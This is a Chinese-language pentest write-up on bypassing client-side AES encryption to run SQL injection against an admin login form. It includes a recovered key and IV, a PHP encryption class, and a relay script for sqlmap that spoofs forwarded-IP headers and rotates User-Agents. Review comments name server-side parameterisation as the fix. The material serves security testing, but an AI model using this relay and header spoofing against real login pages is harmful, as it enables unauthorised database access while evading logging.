0x01 概要
站点:http://aa.test.com:8088/Admin/Login
这样看起来是一个挺正常的界面,测试一下发现存在注入


很清楚的可以看到两张图片是有明显的区别的,说明有注入
抓包时发现请求参数是加密过的!!!!
0x02 查看前端加密方式
前端加密的话,那就只需要找到对应前端加密脚本即可


0x03 编码对应解密脚本

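# AES 加解密脚本
<?php
/**
 * AES/CBC/PKCS5Padding encryption and decryption with lowercase-hex output.
 *
 * The mcrypt API this class was originally written against was removed in
 * PHP 7.2, and the `$text{...}` string-offset syntax used by pkcs5Unpad() is a
 * parse error on PHP 8, so the cipher calls now go through ext/openssl. The
 * output is unchanged: mcrypt's MCRYPT_RIJNDAEL_128 with a 16/24/32-byte key is
 * AES-128/192/256 in CBC mode, and the PKCS#5 padding is still applied by hand.
 *
 * NOTE(review): key and IV are fixed defaults and the IV never changes, so equal
 * plaintexts always produce equal ciphertexts and there is no integrity tag. This
 * class only mirrors a client-side scheme; a server receiving such values gains no
 * assurance from the decryption step and must still treat the plaintext as
 * untrusted input.
 */
class Crypt
{
    /**
     * Legacy mcrypt cipher/mode names (the string values of MCRYPT_RIJNDAEL_128
     * and MCRYPT_MODE_CBC). They are kept so setCipher()/setMode() callers still
     * work, but, exactly as in the original, encrypt()/decrypt() ignore them and
     * always use AES-CBC.
     * @var string
     */
    private $cipher = 'rijndael-128';
    private $mode = 'cbc';

    /** @var string secret key; a 16, 24 or 32 byte key selects AES-128/192/256 */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';

    /** @var string initialisation vector; must be exactly one block (16 bytes) */
    private $iv = '123456789ABCDEFG';

    /** AES block size in bytes; mcrypt_get_block_size(MCRYPT_RIJNDAEL_128, ...) always returned 16. */
    private const BLOCK_SIZE = 16;

    /** Override the cipher label; empty values are ignored (legacy behaviour). No effect on encrypt()/decrypt(). */
    public function setCipher($cipher = ''): void
    {
        if ($cipher) {
            $this->cipher = $cipher;
        }
    }

    /** Override the mode label; empty values are ignored (legacy behaviour). No effect on encrypt()/decrypt(). */
    public function setMode($mode = ''): void
    {
        if ($mode) {
            $this->mode = $mode;
        }
    }

    /** Replace the key; empty values are ignored. Length is validated on the next encrypt()/decrypt(). */
    public function setSecretKey($secret_key = ''): void
    {
        if ($secret_key) {
            $this->secret_key = $secret_key;
        }
    }

    /** Replace the IV; empty values are ignored. Length is validated on the next encrypt()/decrypt(). */
    public function setIv($iv = ''): void
    {
        if ($iv) {
            $this->iv = $iv;
        }
    }

    /**
     * Encrypt: PKCS#5-pad the plaintext, AES-CBC encrypt it, return lowercase hex.
     *
     * @param string $str plaintext of any length, including empty
     * @return string lowercase hex ciphertext; always a multiple of 32 characters
     * @throws InvalidArgumentException when the key or IV length is invalid
     * @throws RuntimeException when OpenSSL reports a failure
     */
    public function encrypt(string $str): string
    {
        $padded = $this->pkcs5Pad($str, self::BLOCK_SIZE);
        // OPENSSL_ZERO_PADDING disables OpenSSL's own PKCS#7 step because the
        // padding was already applied above (mcrypt never padded by itself).
        $raw = openssl_encrypt(
            $padded,
            $this->opensslCipher(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($raw === false) {
            throw new RuntimeException('AES encryption failed: ' . (string) openssl_error_string());
        }
        // bin2hex() already emits lowercase; strtolower() is kept for parity with the original.
        return strtolower(bin2hex($raw));
    }

    /**
     * Decrypt: hex-decode, AES-CBC decrypt, strip PKCS#5 padding.
     *
     * @param string $str hex ciphertext as produced by encrypt(); case-insensitive
     * @return string recovered plaintext
     * @throws InvalidArgumentException when the input is not valid hex, is empty, is not
     *                                  a whole number of blocks, or key/IV length is invalid
     * @throws RuntimeException when OpenSSL fails or the padding is invalid
     *                          (the original returned false here)
     */
    public function decrypt(string $str): string
    {
        $hex = strtolower($str);
        // Validate before hex2bin() so malformed input raises instead of emitting a warning.
        if ($hex === '' || strlen($hex) % 2 !== 0 || !ctype_xdigit($hex)) {
            throw new InvalidArgumentException('ciphertext must be a non-empty, even-length hex string');
        }
        $raw = \hex2bin($hex);
        if ($raw === false || strlen($raw) % self::BLOCK_SIZE !== 0) {
            throw new InvalidArgumentException('ciphertext length must be a multiple of 16 bytes');
        }
        $plain = openssl_decrypt(
            $raw,
            $this->opensslCipher(),
            $this->secret_key,
            OPENSSL_RAW_DATA | OPENSSL_ZERO_PADDING,
            $this->iv
        );
        if ($plain === false) {
            throw new RuntimeException('AES decryption failed: ' . (string) openssl_error_string());
        }
        return $this->pkcs5Unpad($plain);
    }

    /**
     * Map the key length to the OpenSSL cipher name mcrypt would have used for
     * rijndael-128 (AES), and validate key and IV sizes up front.
     *
     * @throws InvalidArgumentException on a key that is not 16/24/32 bytes or an IV that is not 16 bytes
     */
    private function opensslCipher(): string
    {
        $keyBits = strlen($this->secret_key) * 8;
        if (!in_array($keyBits, [128, 192, 256], true)) {
            throw new InvalidArgumentException(
                'AES key must be 16, 24 or 32 bytes, got ' . strlen($this->secret_key)
            );
        }
        if (strlen($this->iv) !== self::BLOCK_SIZE) {
            throw new InvalidArgumentException(
                'AES-CBC IV must be exactly 16 bytes, got ' . strlen($this->iv)
            );
        }
        return 'aes-' . $keyBits . '-cbc';
    }

    /**
     * PKCS#5 padding: append N bytes of value N so the length is a block multiple.
     * N is always 1..$blocksize (a full block is added when the text already fits).
     */
    private function pkcs5Pad(string $text, int $blocksize): string
    {
        $pad = $blocksize - (strlen($text) % $blocksize);
        return $text . str_repeat(chr($pad), $pad);
    }

    /**
     * Remove PKCS#5 padding, verifying every pad byte.
     *
     * The original accepted a pad value of 0 (which then truncated the whole
     * string to '') and returned false on other invalid padding; both now throw.
     *
     * @throws RuntimeException on empty input or malformed padding
     */
    private function pkcs5Unpad(string $text): string
    {
        $len = strlen($text);
        if ($len === 0) {
            throw new RuntimeException('invalid PKCS#5 padding: empty input');
        }
        $pad = ord($text[$len - 1]);
        if ($pad < 1 || $pad > self::BLOCK_SIZE || $pad > $len) {
            throw new RuntimeException('invalid PKCS#5 padding: bad pad length ' . $pad);
        }
        // Every one of the last $pad bytes must equal $pad.
        if (strspn($text, chr($pad), $len - $pad) !== $pad) {
            throw new RuntimeException('invalid PKCS#5 padding: inconsistent pad bytes');
        }
        return substr($text, 0, $len - $pad);
    }
}

// Self-check: the hex printed here is what was compared against the front-end's output.
echo (new Crypt())->encrypt('111');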

可以看到脚本的加密结果与前端的一致,那就可以正常注入了
# 注入脚本
<?php
/**
 * AES/CBC/PKCS5Padding encryption and decryption (same class as the script above).
 *
 * NOTE(review): this copy still relies on the mcrypt extension (mcrypt_cbc,
 * mcrypt_get_block_size, MCRYPT_* constants), which was removed in PHP 7.2, and
 * pkcs5Unpad() uses the `$text{...}` offset syntax that is a parse error on
 * PHP 8 — as written it only runs on PHP 7.1 and older.
 */
class Crypt {
    /**
     * [$cipher cipher]
     * @var [type]
     */
    private $cipher = MCRYPT_RIJNDAEL_128;
    private $mode = MCRYPT_MODE_CBC;
    /**
     * [$key secret key]
     * @var string
     */
    private $secret_key = '123456789ABCDEFG123456789ABCDEFG';
    /**
     * [$iv initialisation vector]
     * @var string
     */
    private $iv = '123456789ABCDEFG';

    // The four setters ignore empty values; note that encrypt()/decrypt() below
    // hard-code MCRYPT_RIJNDAEL_128 / MCRYPT_MODE_CBC and never read $cipher/$mode.
    function setCipher($cipher='') {
        $cipher && $this->cipher = $cipher;
    }
    function setMode($mode='') {
        $mode && $this->mode = $mode;
    }
    function setSecretKey($secret_key='') {
        $secret_key && $this->secret_key = $secret_key;
    }
    function setIv($iv='') {
        $iv && $this->iv = $iv;
    }

    // Encrypt: PKCS#5-pad to the 16-byte block size, AES-CBC encrypt, return lowercase hex.
    // With a 32-byte key and a fixed IV, equal inputs always give equal output.
    function encrypt($str) {
        $size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );
        $str = $this->pkcs5Pad ( $str, $size );
        // '@' hides the mcrypt deprecation warning; failures surface as a false/empty result.
        $data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);
        // bin2hex() converts the raw bytes to a hexadecimal string
        $data=strtolower(bin2hex($data));
        return $data;
    }

    // Decrypt: hex-decode, AES-CBC decrypt, strip padding. Returns false when pkcs5Unpad() rejects the padding.
    function decrypt($str) {
        $str = $this->hex2bin( strtolower($str));
        $str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );
        $str = $this->pkcs5Unpad( $str );
        return $str;
    }

    // Inverse of bin2hex(): two hex characters -> one byte. Non-hex characters are
    // silently ignored by hexdec(), so malformed input yields garbage rather than an error.
    private function hex2bin($hexData) {
        $binData = "";
        for($i = 0; $i < strlen ( $hexData ); $i += 2) {
            $binData .= chr(hexdec(substr($hexData, $i, 2)));
        }
        return $binData;
    }

    // PKCS5 padding: append N bytes of value N (N in 1..blocksize).
    private function pkcs5Pad($text, $blocksize) {
        $pad = $blocksize - (strlen ( $text ) % $blocksize);
        return $text . str_repeat ( chr ( $pad ), $pad );
    }

    // Strip PKCS5 padding; returns false on inconsistent padding.
    // NOTE(review): a pad byte of 0 is not rejected here and would make substr() return ''.
    private function pkcs5Unpad($text) {
        $pad = ord ( $text {strlen ( $text ) - 1} );
        if ($pad > strlen ( $text ))
            return false;
        if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)
            return false;
        return substr ( $text, 0, - 1 * $pad );
    }
}

/**
 * Thin cURL wrapper that POSTs the encrypted form fields to the target URL.
 *
 * NOTE(review): every request carries CLIENT-IP / X-FORWARDED-FOR / HTTP_CLIENT_IP /
 * REMOTE_ADDR headers filled with a random address from getIp(), plus a random
 * User-Agent. Server-side these headers are ordinary client-supplied input; an
 * application must not derive caller identity, rate limits, allow-lists or audit
 * entries from them — only the socket peer address, or a header set by a trusted
 * reverse proxy, is meaningful.
 */
class SqlCurl {
    /**
     * Send one request and return the response body.
     *
     * @param string $url      target URL
     * @param array  $post     form fields; when non-empty the request becomes a POST
     * @param string $cookie   raw Cookie header value, sent only when non-empty
     * @param string $referurl Referer; defaults to https://www.baidu.com when empty
     * @return string|bool response body (CURLOPT_RETURNTRANSFER), or — on a transport
     *                     error — the curl error *message*, which callers cannot tell
     *                     apart from a body. The handle is not closed on that path.
     */
    public function curlRequest($url, $post = [], $cookie = '', $referurl = '') {
        if (!$referurl) {
            $referurl = 'https://www.baidu.com';
        }
        $header = array(
            'CLIENT-IP:' . $this->getIp(),
            'X-FORWARDED-FOR:' . $this->getIp(),
            'HTTP_CLIENT_IP:' .$this->getIp(),
            // NOTE(review): no ':' after the name, so this entry is not a well-formed header line.
            'HTTP_X_FORWARDED_FOR' . $this->getIp(),
            'REMOTE_ADDR:' . $this->getIp(),
            'Content-Type:application/x-www-form-urlencoded',
            'X-Requested-With:XMLHttpRequest',
        );
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        // random browser User-Agent
        curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
        curl_setopt($curl, CURLOPT_REFERER, $referurl);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
        if ($post) {
            curl_setopt($curl, CURLOPT_POST, 1);
            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        }
        if ($cookie) {
            curl_setopt($curl, CURLOPT_COOKIE, $cookie);
        }
        curl_setopt($curl, CURLOPT_TIMEOUT, 10);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        $data = curl_exec($curl);
        if (curl_errno($curl)) {
            // Error message returned in place of the body; $curl is left open here.
            return curl_error($curl);
        }
        curl_close($curl);
        return $data;
    }

    // Random dotted-quad used only to populate the spoofed address headers above;
    // mt_rand() is not a CSPRNG, which is irrelevant for this purpose.
    private function getIp() {
        return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);
    }

    // Pick one User-Agent string at random; the array keys are labels only.
    private function agentArry() {
        $agentarry = [
            // Desktop user agents
            "safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
            "safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
            "Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
            "IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
            "IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",
            "IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
            "IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
            "IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
            "Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
            "Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
            "Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
            "Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
            "Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
            "傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
            "腾讯TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
            "世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
            "世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
            "360浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
            "搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
            "Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
            "Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
            // Mobile user agents
            "safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
            "safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
            "safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
            "Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
            "Android QQ浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
            "Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
            "Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
            "BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
            "WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
            "UC标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",
            "UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",
            "UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
            "微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",
        ];
        return $agentarry[array_rand($agentarry, 1)];
    }
}

// http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#
// The two form fields are read straight from the query string, encrypted with the
// key/IV recovered from the page's own front-end script, and forwarded as the login
// POST. NOTE(review): because key and IV are public, this client-side "encryption"
// is an encoding step rather than a security control — the only effective defence
// is for the server to parameterise the query it builds from the decrypted values.
$data['UserName'] = (new Crypt())->encrypt($_GET['UserName']);
$data['Password'] = (new Crypt())->encrypt($_GET['Password']);
echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);
0x04 Sqlmap正常注入


